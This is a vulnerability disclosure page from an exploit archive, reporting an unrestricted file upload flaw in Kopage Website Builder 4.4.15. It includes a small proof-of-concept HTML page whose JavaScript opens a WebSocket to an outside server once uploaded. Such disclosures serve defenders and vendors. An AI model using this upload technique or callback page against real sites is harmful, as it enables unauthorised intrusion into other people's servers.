Kopage Website Builder 4.4.15 Shell Upload

Kopage Website Builder 4.4.15 Shell Upload: Posted Dec 8, 2023; Authored by nu11secur1ty; Kopage Website Builder version 4.4.15 appears to suffer from a remote shell upload vulnerability.; tags | exploit, remote, shell; SHA-256 | c7c044286a2574e2349a91e45670f2ab02c5df6ed10e4f242160211e6c892661; Download | Favorite | View

Kopage Website Builder 4.4.15 Shell Upload

## Title: Kopage-Website-Builder-4.4.15-File-Upload-RCE
## Author: nu11secur1ty
## Date: 12/08/2023
## Vendor: https://www.kopage.com/
## Software: https://demo.kopage.com/index.php
## Reference: https://portswigger.net/web-security/file-upload,
https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload

## Description:
The file upload function suffers from file upload vulnerability, there
is no strong sanitizing function for uploading some extension files.
In this case, I uploaded an HTML web socket client on their server and
then I connected this client with my javascript server =)
Depending on the scenario, this can be the end of privacy and even
worse than ever!
I am a Penetration Tester, not a stupid cracker! Thank you all!

STATUS: CRITICAL Vulnerability

[+]Exploit client:
```POST
<html>
  <script>
(() => {
  const ws = new WebSocket('ws://0.0.0.0:8080')
  ws.onopen = () => {
    console.log('ws opened on browser')
    ws.send('hello world you are hacked :D')
  }

  ws.onmessage = (message) => {
    console.log(`message received ${message}`)
  }

})()
 </script>
</html>

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kopage.com/Kopage-Website-Builder-4.4.15)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/12/kopage-website-builder-4415-file-upload.html)

## Time spent:
00:35:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>

Top Authors In Last 30 Days

Red Hat 276 files
Ubuntu 65 files
Debian 25 files
Gentoo 16 files
LiquidWorm 10 files
nu11secur1ty 5 files
kai6u 3 files
Adam Gowdiak 3 files
liquidsky 3 files
gabe_k 3 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,028)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,483)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,509)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,710)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,480)
UNIX (9,395)
UnixWare (187)
Windows (6,653)
Other

Kopage Website Builder 4.4.15 Shell Upload

Kopage Website Builder 4.4.15 Shell Upload

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Kopage Website Builder 4.4.15 Shell Upload

Share This

Kopage Website Builder 4.4.15 Shell Upload

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems